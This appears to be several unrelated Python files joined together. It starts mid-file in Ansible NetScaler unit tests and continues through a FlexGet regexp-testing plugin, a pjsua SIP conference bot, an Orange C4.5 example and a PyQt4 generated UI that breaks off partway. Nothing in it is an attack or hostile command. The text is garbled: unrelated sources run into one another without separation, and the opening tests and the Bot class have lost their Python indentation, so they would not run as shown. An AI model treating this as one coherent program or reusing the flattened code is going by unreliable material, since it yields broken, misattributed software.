service_exists_mock = Mock(side_effect=[True, True])
service_identical_mock = Mock(side_effect=[True, True])
monitor_bindings_identical_mock = Mock(side_effect=[True, True])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
service_identical=service_identical_mock,
monitor_bindings_identical=monitor_bindings_identical_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
self.assertFalse(result['changed'], msg='Erroneous changed status update')
def test_absent_operation(self):
self.set_module_state('absent')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[True, False])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_has_calls([call.delete()])
self.assertTrue(result['changed'], msg='Changed status not set correctly')
def test_absent_operation_no_change(self):
self.set_module_state('absent')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[False, False])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_not_called()
self.assertFalse(result['changed'], msg='Changed status not set correctly')
def test_graceful_nitro_exception_operation_present(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
class MockException(Exception):
def __init__(self, *args, **kwargs):
self.errorcode = 0
self.message = ''
m = Mock(side_effect=MockException)
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
service_exists=m,
nitro_exception=MockException
):
self.module = netscaler_service
result = self.failed()
self.assertTrue(
result['msg'].startswith('nitro exception'),
msg='Nitro exception not caught on operation present'
)
def test_graceful_nitro_exception_operation_absent(self):
    """state=absent: a nitro_exception raised while probing for the
    service must surface as a graceful module failure message."""
    self.set_module_state('absent')
    from ansible.modules.network.netscaler import netscaler_service

    class FakeNitroError(Exception):
        def __init__(self, *args, **kwargs):
            self.errorcode = 0
            self.message = ''

    raising_probe = Mock(side_effect=FakeNitroError)
    patched_module = patch.multiple(
        'ansible.modules.network.netscaler.netscaler_service',
        service_exists=raising_probe,
        nitro_exception=FakeNitroError,
    )
    with patched_module:
        self.module = netscaler_service
        result = self.failed()
        failure_text = result['msg']
        self.assertTrue(
            failure_text.startswith('nitro exception'),
            msg='Nitro exception not caught on operation absent'
        )
from __future__ import unicode_literals, division, absolute_import, print_function
import logging
from flexget import options, plugin
from flexget.event import event
from flexget.logger import console
log = logging.getLogger('try_regexp')
class PluginTryRegexp(object):
    """
    This plugin allows user to test regexps for a task.

    When the task is executed with --try-regexp, an interactive prompt is
    shown after input phase; each regexp the user enters is matched against
    every string field of every entry.
    """

    def __init__(self):
        # Set once the user types 'continue'/'abort'; suppresses the
        # interactive prompt for all later tasks in this execution.
        self.abort = False

    def matches(self, entry, regexp):
        """Return True if any of the entry string fields match given regexp"""
        import re
        for field, value in entry.iteritems():
            if not isinstance(value, basestring):
                continue
            if re.search(regexp, value, re.IGNORECASE | re.UNICODE):
                return (True, field)
        return (False, None)

    def on_task_filter(self, task, config):
        import re
        if not task.options.try_regexp:
            return
        if self.abort:
            return
        console('-' * 79)
        console('Hi there, welcome to try regexps in realtime!')
        console('Press ^D or type \'exit\' to continue. Type \'continue\' to continue non-interactive execution.')
        console('Task \'%s\' has %s entries, enter regexp to see what matches it.' % (task.name, len(task.entries)))
        while True:
            try:
                s = raw_input('--> ')
                if s == 'exit':
                    break
                if s == 'abort' or s == 'continue':
                    self.abort = True
                    break
            except EOFError:
                break
            count = 0
            for entry in task.entries:
                try:
                    match, field = self.matches(entry, s)
                    if match:
                        console('Title: %-40s URL: %-30s From: %s' % (entry['title'], entry['url'], field))
                        count += 1
                except re.error:
                    # FIX: was a bare `except:`, which also swallowed
                    # KeyboardInterrupt and genuine bugs; only bad patterns
                    # should be reported as invalid regexps.
                    console('Invalid regular expression')
                    break
            console('%s of %s entries matched' % (count, len(task.entries)))
        console('Bye!')
@event('plugin.register')
def register_plugin():
    # builtin=True keeps the plugin always loaded; it only acts when the
    # --try-regexp command-line option is present (checked in on_task_filter).
    plugin.register(PluginTryRegexp, '--try-regexp', builtin=True, api_ver=2)
@event('options.register')
def register_parser_arguments():
    # Attach the --try-regexp flag to the 'execute' subcommand parser.
    options.get_parser('execute').add_argument('--try-regexp', action='store_true', dest='try_regexp', default=False,
                                               help='try regular expressions interactively')
# $Id$
#
# SIP Conference Bot
#
# Copyright (C) 2008-2009 Teluu Inc. (http://www.teluu.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import pjsua as pj
import string
import sys
# Name of the Python config module loaded via __import__() in Bot.main().
CFG_FILE = "config"
# Verbosity levels accepted by Bot.DEBUG() (level is currently unused there).
INFO = 1
TRACE = 2
# Call callback. This would just forward the event to the Member class
class CallCb(pj.CallCallback):
    # Thin adapter: pjsua invokes these callbacks and each one is delegated
    # unchanged to the Member that owns the call; no logic lives here.
    def __init__(self, member, call=None):
        pj.CallCallback.__init__(self, call)
        self.member = member  # owning Member instance
    def on_state(self):
        self.member.on_call_state(self.call)
    def on_media_state(self):
        self.member.on_call_media_state(self.call)
    def on_dtmf_digit(self, digits):
        self.member.on_call_dtmf_digit(self.call, digits)
    def on_transfer_request(self, dst, code):
        # Member decides the response code for the transfer request.
        return self.member.on_call_transfer_request(self.call, dst, code)
    def on_transfer_status(self, code, reason, final, cont):
        return self.member.on_call_transfer_status(self.call, code, reason, final, cont)
    def on_replace_request(self, code, reason):
        return self.member.on_call_replace_request(self.call, code, reason)
    def on_replaced(self, new_call):
        self.member.on_call_replaced(self.call, new_call)
    def on_typing(self, is_typing):
        self.member.on_typing(is_typing, call=self.call)
    def on_pager(self, mime_type, body):
        self.member.on_pager(mime_type, body, call=self.call)
    def on_pager_status(self, body, im_id, code, reason):
        self.member.on_pager_status(body, im_id, code, reason, call=self.call)
# Buddy callback. This would just forward the event to Member class
class BuddyCb(pj.BuddyCallback):
    # Thin adapter: presence/IM events from pjsua are delegated unchanged
    # to the Member that owns this buddy subscription.
    def __init__(self, member, buddy=None):
        pj.BuddyCallback.__init__(self, buddy)
        self.member = member  # owning Member instance
    def on_pager(self, mime_type, body):
        self.member.on_pager(mime_type, body, buddy=self.buddy)
    def on_pager_status(self, body, im_id, code, reason):
        self.member.on_pager_status(body, im_id, code, reason, buddy=self.buddy)
    def on_state(self):
        self.member.on_pres_state(self.buddy)
    def on_typing(self, is_typing):
        self.member.on_typing(is_typing, buddy=self.buddy)
##############################################################################
#
#
# This class represents individual room member (either/both chat and voice conf)
#
#
class Member:
    """A single conference-room participant, tracked both as an IM/presence
    buddy (chatroom) and as a call leg (voice conference)."""

    def __init__(self, bot, uri):
        self.uri = uri
        self.bot = bot
        self.call = None        # active pj.Call, or None when not in a call
        self.buddy = None       # pj.Buddy presence subscription, or None
        self.bi = pj.BuddyInfo()
        self.in_chat = False    # presence subscription is active
        self.in_voice = False   # call media is flowing into the conference
        self.im_error = False   # last IM to this member failed to deliver
        self.html = False       # member asked for HTML-escaped bodies

    def __str__(self):
        # One status line for --list output. The local was renamed from
        # 'str', which shadowed the builtin.
        text = string.ljust(self.uri, 30) + " -- "
        if self.buddy:
            bi = self.buddy.info()
            text = text + bi.online_text
        else:
            text = text + "Offline"
        text = text + " ["
        if (self.in_voice):
            text = text + " voice"
        if (self.in_chat):
            text = text + " chat"
        if (self.html):
            text = text + " html"
        else:
            text = text + " plain"
        if (self.im_error):
            text = text + " im_error"
        text = text + "]"
        return text

    def join_call(self, call):
        """Adopt a call as this member's voice leg, replacing any old one."""
        if self.call:
            self.call.hangup(603, "You have been disconnected for making another call")
        self.call = call
        call.set_callback(CallCb(self, call))
        msg = "%(uri)s is attempting to join the voice conference" % \
              {'uri': self.uri}
        self.bot.DEBUG(msg + "\n", INFO)
        self.bot.broadcast_pager(None, msg)

    def join_chat(self):
        """Subscribe to this member's presence, adding it to the chatroom."""
        if not self.buddy:
            self.bot.DEBUG(self.uri + " joining chatroom...\n", INFO)
            self.buddy = self.bot.acc.add_buddy(self.uri)
            self.buddy.set_callback(BuddyCb(self, self.buddy))
            self.buddy.subscribe()
        else:
            self.bot.DEBUG(self.uri + " already in chatroom, resubscribing..\n", INFO)
            self.buddy.subscribe()

    def send_pager(self, body, mime="text/plain"):
        """Deliver an IM to this member if it is reachable in the chatroom."""
        self.bot.DEBUG("send_pager() to " + self.uri)
        if self.in_chat and not self.im_error and self.buddy:
            if self.html:
                #This will make us receive html!
                #mime = "text/html"
                # FIX: the entity strings below had been corrupted (the
                # literal replacements had been un-escaped, which even made
                # the '&quot;' line a syntax error). Escape markup so the
                # body renders literally in HTML-capable clients.
                body = body.replace("<", "&lt;")
                body = body.replace(">", "&gt;")
                body = body.replace('"', "&quot;")
                body = body.replace("\n", "<BR>\n")
            self.buddy.send_pager(body, content_type=mime)
            self.bot.DEBUG("..sent\n")
        else:
            self.bot.DEBUG("..not sent!\n")

    def on_call_state(self, call):
        """Announce join/leave of the voice conference on call state changes."""
        ci = call.info()
        if ci.state==pj.CallState.DISCONNECTED:
            if self.in_voice:
                msg = "%(uri)s has left the voice conference (%(1)d/%(2)s)" % \
                      {'uri': self.uri, '1': ci.last_code, '2': ci.last_reason}
                self.bot.DEBUG(msg + "\n", INFO)
                self.bot.broadcast_pager(None, msg)
            self.in_voice = False
            self.call = None
            # May drop the member entirely if it is not in chat either.
            self.bot.on_member_left(self)
        elif ci.state==pj.CallState.CONFIRMED:
            msg = "%(uri)s has joined the voice conference" % \
                  {'uri': self.uri}
            self.bot.DEBUG(msg + "\n", INFO)
            self.bot.broadcast_pager(None, msg)

    def on_call_media_state(self, call):
        """Wire the call into (or note its removal from) the mixer."""
        self.bot.DEBUG("Member.on_call_media_state\n")
        ci = call.info()
        if ci.conf_slot!=-1:
            if not self.in_voice:
                msg = self.uri + " call media is active"
                self.bot.broadcast_pager(None, msg)
            self.in_voice = True
            self.bot.add_to_voice_conf(self)
        else:
            if self.in_voice:
                msg = self.uri + " call media is inactive"
                self.bot.broadcast_pager(None, msg)
            self.in_voice = False

    def on_call_dtmf_digit(self, call, digits):
        msg = "%(uri)s sent DTMF digits %(dig)s" % \
              {'uri': self.uri, 'dig': digits}
        self.bot.broadcast_pager(None, msg)

    def on_call_transfer_request(self, call, dst, code):
        msg = "%(uri)s is transferring the call to %(dst)s" % \
              {'uri': self.uri, 'dst': dst}
        self.bot.broadcast_pager(None, msg)
        # 202 Accepted: let the transfer proceed.
        return 202

    def on_call_transfer_status(self, call, code, reason, final, cont):
        msg = "%(uri)s call transfer status is %(code)d/%(res)s" % \
              {'uri': self.uri, 'code': code, 'res': reason}
        self.bot.broadcast_pager(None, msg)
        # True: keep receiving transfer status notifications.
        return True

    def on_call_replace_request(self, call, code, reason):
        msg = "%(uri)s is requesting call replace" % \
              {'uri': self.uri}
        self.bot.broadcast_pager(None, msg)
        # Echo back the proposed code/reason, accepting the replace.
        return (code, reason)

    def on_call_replaced(self, call, new_call):
        msg = "%(uri)s call is replaced" % \
              {'uri': self.uri}
        self.bot.broadcast_pager(None, msg)

    def on_pres_state(self, buddy):
        """Track subscription lifecycle: join/leave chatroom on presence."""
        old_bi = self.bi
        self.bi = buddy.info()
        msg = "%(uri)s status is %(st)s" % \
              {'uri': self.uri, 'st': self.bi.online_text}
        self.bot.DEBUG(msg + "\n", INFO)
        self.bot.broadcast_pager(self, msg)
        if self.bi.sub_state==pj.SubscriptionState.ACTIVE:
            if not self.in_chat:
                self.in_chat = True
                buddy.send_pager("Welcome to chatroom")
                self.bot.broadcast_pager(self, self.uri + " has joined the chat room")
            else:
                self.in_chat = True
        elif self.bi.sub_state==pj.SubscriptionState.NULL or \
             self.bi.sub_state==pj.SubscriptionState.TERMINATED or \
             self.bi.sub_state==pj.SubscriptionState.UNKNOWN:
            # Subscription is gone: drop the buddy and possibly the member.
            self.buddy.delete()
            self.buddy = None
            if self.in_chat:
                self.in_chat = False
                self.bot.broadcast_pager(self, self.uri + " has left the chat room")
            else:
                self.in_chat = False
            self.bot.on_member_left(self)

    def on_typing(self, is_typing, call=None, buddy=None):
        if is_typing:
            msg = self.uri + " is typing..."
        else:
            msg = self.uri + " has stopped typing"
        self.bot.broadcast_pager(self, msg)

    def on_pager(self, mime_type, body, call=None, buddy=None):
        # Commands (e.g. --list) are handled by the bot; everything else is
        # relayed to the other chatroom members.
        if not self.bot.handle_cmd(self, None, body):
            msg = self.uri + ": " + body
            self.bot.broadcast_pager(self, msg, mime_type)

    def on_pager_status(self, body, im_id, code, reason, call=None, buddy=None):
        # Remember delivery failure so we stop sending to this member.
        self.im_error = (code/100 != 2)
##############################################################################
#
#
# The Bot instance (singleton)
#
#
class Bot(pj.AccountCallback):
def __init__(self):
pj.AccountCallback.__init__(self, None)
self.lib = pj.Lib()
self.acc = None
self.calls = []
self.members = {}
self.cfg = None
def DEBUG(self, msg, level=TRACE):
print msg,
def helpstring(self):
return """
--h[elp] Display this help screen
--j[oin] Join the chat room
--html on|off Set to receive HTML or plain text
Participant commands:
--s[how] Show confbot settings
--leave Leave the chatroom
--l[ist] List all members
Admin commands:
--a[dmin] <CMD> Where <CMD> are:
list List the admins
add <URI> Add URI as admin
del <URI> Remove URI as admin
rr Reregister account to server
call <URI> Make call to the URI and add to voice conf
dc <URI> Disconnect call to URI
hold <URI> Hold call with that URI
update <URI> Send UPDATE to call with that URI
reinvite <URI> Send re-INVITE to call with that URI
"""
def listmembers(self):
msg = ""
for uri, m in self.members.iteritems():
msg = msg + str(m) + "\n"
return msg
def showsettings(self):
ai = self.acc.info()
msg = """
ConfBot status and settings:
URI: %(uri)s
Status: %(pres)s
Reg Status: %(reg_st)d
Reg Reason: %(reg_res)s
""" % {'uri': ai.uri, 'pres': ai.online_text, \
'reg_st': ai.reg_status, 'reg_res': ai.reg_reason}
return msg
def main(self, cfg_file):
try:
cfg = self.cfg = __import__(cfg_file)
self.lib.init(ua_cfg=cfg.ua_cfg, log_cfg=cfg.log_cfg, media_cfg=cfg.media_cfg)
self.lib.set_null_snd_dev()
transport = None
if cfg.udp_cfg:
transport = self.lib.create_transport(pj.TransportType.UDP, cfg.udp_cfg)
if cfg.tcp_cfg:
t = self.lib.create_transport(pj.TransportType.TCP, cfg.tcp_cfg)
if not transport:
transport = t
self.lib.start()
if cfg.acc_cfg:
self.DEBUG("Creating account %(uri)s..\n" % {'uri': cfg.acc_cfg.id}, INFO)
self.acc = self.lib.create_account(cfg.acc_cfg, cb=self)
else:
self.DEBUG("Creating account for %(t)s..\n" % \
{'t': transport.info().description}, INFO)
self.acc = self.lib.create_account_for_transport(transport, cb=self)
self.acc.set_basic_status(True)
# Wait for ENTER before quitting
print "Press q to quit or --help/--h for help"
while True:
input = sys.stdin.readline().strip(" \t\r\n")
if not self.handle_cmd(None, None, input):
if input=="q":
break
self.lib.destroy()
self.lib = None
except pj.Error, e:
print "Exception: " + str(e)
if self.lib:
self.lib.destroy()
self.lib = None
def broadcast_pager(self, exclude_member, body, mime_type="text/plain"):
self.DEBUG("Broadcast: " + body + "\n")
for uri, m in self.members.iteritems():
if m != exclude_member:
m.send_pager(body, mime_type)
def add_to_voice_conf(self, member):
if not member.call:
return
src_ci = member.call.info()
self.DEBUG("bot.add_to_voice_conf\n")
for uri, m in self.members.iteritems():
if m==member:
continue
if not m.call:
continue
dst_ci = m.call.info()
if dst_ci.media_state==pj.MediaState.ACTIVE and dst_ci.conf_slot!=-1:
self.lib.conf_connect(src_ci.conf_slot, dst_ci.conf_slot)
self.lib.conf_connect(dst_ci.conf_slot, src_ci.conf_slot)
def on_member_left(self, member):
if not member.call and not member.buddy:
del self.members[member.uri]
del member
def handle_admin_cmd(self, member, body):
if member and self.cfg.admins and not member.uri in self.cfg.admins:
member.send_pager("You are not admin")
return
args = body.split()
msg = ""
if len(args)==1:
args.append(" ")
if args[1]=="list":
if not self.cfg.admins:
msg = "Everyone is admin!"
else:
msg = str(self.cfg.admins)
elif args[1]=="add":
if len(args)!=3:
msg = "Usage: add <URI>"
else:
self.cfg.admins.append(args[2])
msg = args[2] + " added as admin"
elif args[1]=="del":
if len(args)!=3:
msg = "Usage: del <URI>"
elif args[2] not in self.cfg.admins:
msg = args[2] + " is not admin"
else:
self.cfg.admins.remove(args[2])
msg = args[2] + " has been removed from admins"
elif args[1]=="rr":
msg = "Reregistering.."
self.acc.set_registration(True)
elif args[1]=="call":
if len(args)!=3:
msg = "Usage: call <URI>"
else:
uri = args[2]
try:
call = self.acc.make_call(uri)
except pj.Error, e:
msg = "Error: " + str(e)
call = None
if call:
if not uri in self.members:
m = Member(self, uri)
self.members[m.uri] = m
else:
m = self.members[uri]
msg = "Adding " + m.uri + " to voice conference.."
m.join_call(call)
elif args[1]=="dc" or args[1]=="hold" or args[1]=="update" or args[1]=="reinvite":
if len(args)!=3:
msg = "Usage: " + args[1] + " <URI>"
else:
uri = args[2]
if not uri in self.members:
msg = "Member not found/URI doesn't match (note: case matters!)"
else:
m = self.members[uri]
if m.call:
if args[1]=="dc":
msg = "Disconnecting.."
m.call.hangup(603, "You're disconnected by admin")
elif args[1]=="hold":
msg = "Holding the call"
m.call.hold()
elif args[1]=="update":
msg = "Sending UPDATE"
m.call.update()
elif args[1]=="reinvite":
msg = "Sending re-INVITE"
m.call.reinvite()
else:
msg = "He is not in call"
else:
msg = "Unknown admin command " + body
#print "msg is '%(msg)s'" % {'msg': msg}
if True:
if member:
member.send_pager(msg)
else:
print msg
def handle_cmd(self, member, from_uri, body):
body = body.strip(" \t\r\n")
msg = ""
handled = True
if body=="--l" or body=="--list":
msg = self.listmembers()
if msg=="":
msg = "Nobody is here"
elif body[0:3]=="--s":
msg = self.showsettings()
elif body[0:6]=="--html" and member:
if body[8:11]=="off":
member.html = False
else:
member.html = True
elif body=="--h" or body=="--help":
msg = self.helpstring()
elif body=="--leave":
if not member or not member.buddy:
msg = "You are not in chatroom"
else:
member.buddy.unsubscribe()
elif body[0:3]=="--j":
if not from_uri in self.members:
m = Member(self, from_uri)
self.members[m.uri] = m
self.DEBUG("Adding " + m.uri + " to chatroom\n")
m.join_chat()
else:
m = self.members[from_uri]
self.DEBUG("Adding " + m.uri + " to chatroom\n")
m.join_chat()
elif body[0:3]=="--a":
self.handle_admin_cmd(member, body)
handled = True
else:
handled = False
if msg:
if member:
member.send_pager(msg)
elif from_uri:
self.acc.send_pager(from_uri, msg);
else:
print msg
return handled
def on_incoming_call(self, call):
self.DEBUG("on_incoming_call from %(uri)s\n" % {'uri': call.info().remote_uri}, INFO)
ci = call.info()
if not ci.remote_uri in self.members:
m = Member(self, ci.remote_uri)
self.members[m.uri] = m
m.join_call(call)
else:
m = self.members[ci.remote_uri]
m.join_call(call)
call.answer(200)
def on_incoming_subscribe(self, buddy, from_uri, contact_uri, pres_obj):
self.DEBUG("on_incoming_subscribe from %(uri)s\n" % from_uri, INFO)
return (200, 'OK')
def on_reg_state(self):
ai = self.acc.info()
self.DEBUG("Registration state: %(code)d/%(reason)s\n" % \
{'code': ai.reg_status, 'reason': ai.reg_reason}, INFO)
if ai.reg_status/100==2 and ai.reg_expires > 0:
self.acc.set_basic_status(True)
def on_pager(self, from_uri, contact, mime_type, body):
body = body.strip(" \t\r\n")
if not self.handle_cmd(None, from_uri, body):
self.acc.send_pager(from_uri, "You have not joined the chat room. Type '--join' to join or '--help' for the help")
def on_pager_status(self, to_uri, body, im_id, code, reason):
pass
def on_typing(self, from_uri, contact, is_typing):
pass
##############################################################################
#
#
# main()
#
#
if __name__ == "__main__":
    # Create the bot singleton and run it with the module-level config name.
    bot = Bot()
    bot.main(CFG_FILE)
# Description: Shows how to use C4.5 learner
# Category: learning
# Classes: C45Learner, C45Classifier
# Uses: iris
# Referenced: C45Learner.htm
import orange

# Train C4.5 on the bundled iris dataset with default arguments and
# classify the first five examples next to their true class.
data = orange.ExampleTable("iris")
tree = orange.C45Learner(data)
print "\n\nC4.5 with default arguments"
for i in data[:5]:
    print tree(i), i.getclass()

# Same learner with the m argument set (C4.5's -m option).
print "\n\nC4.5 with m=100"
tree = orange.C45Learner(data, m=100)
for i in data[:5]:
    print tree(i), i.getclass()

# minObjs appears to be the Orange-style alias for the same option
# (this example mirrors the m=100 one above).
print "\n\nC4.5 with minObjs=100"
tree = orange.C45Learner(data, minObjs=100)
for i in data[:5]:
    print tree(i), i.getclass()

# Pass raw C4.5 command-line switches and print only misclassifications.
print "\n\nC4.5 with -m 1 and -s"
lrn = orange.C45Learner()
lrn.commandline("-m 1 -s")
tree = lrn(data)
for i in data:
    if i.getclass() != tree(i):
        print i, tree(i)

# Print the induced tree using the helper module.
import orngC45
tree = orange.C45Learner(data)
orngC45.printTree(tree)
print

# Cross-validate the native C4.5 classifier against the same learner
# converted to an Orange tree, and report CA and Brier score for both.
import orngStat, orngTest
res = orngTest.crossValidation([orange.C45Learner(), orange.C45Learner(convertToOrange=1)], data)
print "Classification accuracy: %5.3f (converted to tree: %5.3f)" % tuple(orngStat.CA(res))
print "Brier score: %5.3f (converted to tree: %5.3f)" % tuple(orngStat.BrierScore(res))
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/shunya/Dropbox/workspace/Python/eHayashiya/repaperCompanion.ui'
#
# Created: Mon Apr 27 17:53:27 2015
# by: PyQt4 UI code generator 4.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
    # PyQt4 API v1: QString exists and needs an explicit UTF-8 conversion.
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # API v2 / Python 3: plain str is already unicode; identity suffices.
    def _fromUtf8(s):
        return s
try:
    # Older PyQt4 translate() takes an encoding argument.
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Newer PyQt4 dropped the encoding parameter from translate().
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    # Auto-generated by pyuic4 from repaperCompanion.ui -- do not hand-edit
    # widget construction; regenerate from the .ui file instead.

    def setupUi(self, MainWindow):
        """Create and lay out all widgets of the main window."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(788, 602)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.horizontalLayout = QtGui.QHBoxLayout(self.centralwidget)
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        # Left column: port/device selectors, image preview, send buttons, log.
        self.verticalLayout_2 = QtGui.QVBoxLayout()
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.label_3 = QtGui.QLabel(self.centralwidget)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.horizontalLayout_2.addWidget(self.label_3)
        self.comboBox = QtGui.QComboBox(self.centralwidget)
        self.comboBox.setObjectName(_fromUtf8("comboBox"))
        self.horizontalLayout_2.addWidget(self.comboBox)
        self.connectPushButton = QtGui.QPushButton(self.centralwidget)
        self.connectPushButton.setObjectName(_fromUtf8("connectPushButton"))
        self.horizontalLayout_2.addWidget(self.connectPushButton)
        self.verticalLayout_2.addLayout(self.horizontalLayout_2)
        self.formLayout = QtGui.QFormLayout()
        self.formLayout.setObjectName(_fromUtf8("formLayout"))
        self.label_2 = QtGui.QLabel(self.centralwidget)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.label_2)
        self.comboBoxDevice = QtGui.QComboBox(self.centralwidget)
        self.comboBoxDevice.setObjectName(_fromUtf8("comboBoxDevice"))
        self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.comboBoxDevice)
        self.verticalLayout_2.addLayout(self.formLayout)
        # Fixed-size preview label matching the e-paper resolution (264x176).
        self.imageLabel = QtGui.QLabel(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.imageLabel.sizePolicy().hasHeightForWidth())
        self.imageLabel.setSizePolicy(sizePolicy)
        self.imageLabel.setMinimumSize(QtCore.QSize(264, 176))
        self.imageLabel.setObjectName(_fromUtf8("imageLabel"))
        self.verticalLayout_2.addWidget(self.imageLabel)
        self.sendPushButton = QtGui.QPushButton(self.centralwidget)
        font = QtGui.QFont()
        font.setPointSize(26)
        self.sendPushButton.setFont(font)
        self.sendPushButton.setObjectName(_fromUtf8("sendPushButton"))
        self.verticalLayout_2.addWidget(self.sendPushButton)
        self.saveXBMpushButton = QtGui.QPushButton(self.centralwidget)
        self.saveXBMpushButton.setObjectName(_fromUtf8("saveXBMpushButton"))
        self.verticalLayout_2.addWidget(self.saveXBMpushButton)
        self.logPlainTextEdit = QtGui.QPlainTextEdit(self.centralwidget)
        self.logPlainTextEdit.setObjectName(_fromUtf8("logPlainTextEdit"))
        self.verticalLayout_2.addWidget(self.logPlainTextEdit)
        self.horizontalLayout.addLayout(self.verticalLayout_2)
        # Right side: tab widget with the 'Image' and 'Advanced' pages.
        self.tabWidget = QtGui.QTabWidget(self.centralwidget)
        self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
        self.tab = QtGui.QWidget()
        self.tab.setObjectName(_fromUtf8("tab"))
        self.verticalLayout_4 = QtGui.QVBoxLayout(self.tab)
        self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.pushButtonAdd = QtGui.QPushButton(self.tab)
        self.pushButtonAdd.setObjectName(_fromUtf8("pushButtonAdd"))
        self.horizontalLayout_3.addWidget(self.pushButtonAdd)
        self.pushButtonPaste = QtGui.QPushButton(self.tab)
        self.pushButtonPaste.setObjectName(_fromUtf8("pushButtonPaste"))
        self.horizontalLayout_3.addWidget(self.pushButtonPaste)
        self.pushButtonRotate = QtGui.QPushButton(self.tab)
        self.pushButtonRotate.setObjectName(_fromUtf8("pushButtonRotate"))
        self.horizontalLayout_3.addWidget(self.pushButtonRotate)
        self.pushButtonPreview = QtGui.QPushButton(self.tab)
        self.pushButtonPreview.setObjectName(_fromUtf8("pushButtonPreview"))
        self.horizontalLayout_3.addWidget(self.pushButtonPreview)
        self.verticalLayout_4.addLayout(self.horizontalLayout_3)
        # Custom view class imported from graphicsscene at module bottom.
        self.view = GraphicsView(self.tab)
        self.view.setObjectName(_fromUtf8("view"))
        self.verticalLayout_4.addWidget(self.view)
        self.tabWidget.addTab(self.tab, _fromUtf8(""))
        self.tab_2 = QtGui.QWidget()
        self.tab_2.setObjectName(_fromUtf8("tab_2"))
        self.verticalLayout_3 = QtGui.QVBoxLayout(self.tab_2)
        self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
        self.groupBox = QtGui.QGroupBox(self.tab_2)
        self.groupBox.setObjectName(_fromUtf8("groupBox"))
        self.verticalLayout = QtGui.QVBoxLayout(self.groupBox)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.gridLayout = QtGui.QGridLayout()
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.sectorLabel = QtGui.QLabel(self.groupBox)
        self.sectorLabel.setObjectName(_fromUtf8("sectorLabel"))
        self.gridLayout.addWidget(self.sectorLabel, 0, 0, 1, 1)
        self.sectorSpinBox = QtGui.QSpinBox(self.groupBox)
        self.sectorSpinBox.setMaximum(128)
        self.sectorSpinBox.setProperty("value", 37)
        self.sectorSpinBox.setObjectName(_fromUtf8("sectorSpinBox"))
        self.gridLayout.addWidget(self.sectorSpinBox, 0, 1, 1, 1)
        self.randomPushButton = QtGui.QPushButton(self.groupBox)
        self.randomPushButton.setObjectName(_fromUtf8("randomPushButton"))
        self.gridLayout.addWidget(self.randomPushButton, 0, 2, 1, 1)
        self.qdPushButton = QtGui.QPushButton(self.groupBox)
        self.qdPushButton.setObjectName(_fromUtf8("qdPushButton"))
        self.gridLayout.addWidget(self.qdPushButton, 1, 0, 1, 1)
        self.dPushButton = QtGui.QPushButton(self.groupBox)
        self.dPushButton.setObjectName(_fromUtf8("dPushButton"))
        self.gridLayout.addWidget(self.dPushButton, 1, 2, 1, 1)
        self.uPushButton = QtGui.QPushButton(self.groupBox)
        self.uPushButton.setObjectName(_fromUtf8("uPushButton"))
        self.gridLayout.addWidget(self.uPushButton, 2, 0, 1, 2)
        self.ePushButton = QtGui.QPushButton(self.groupBox)
        self.ePushButton.setObjectName(_fromUtf8("ePushButton"))
        self.gridLayout.addWidget(self.ePushButton, 2, 2, 1, 1)
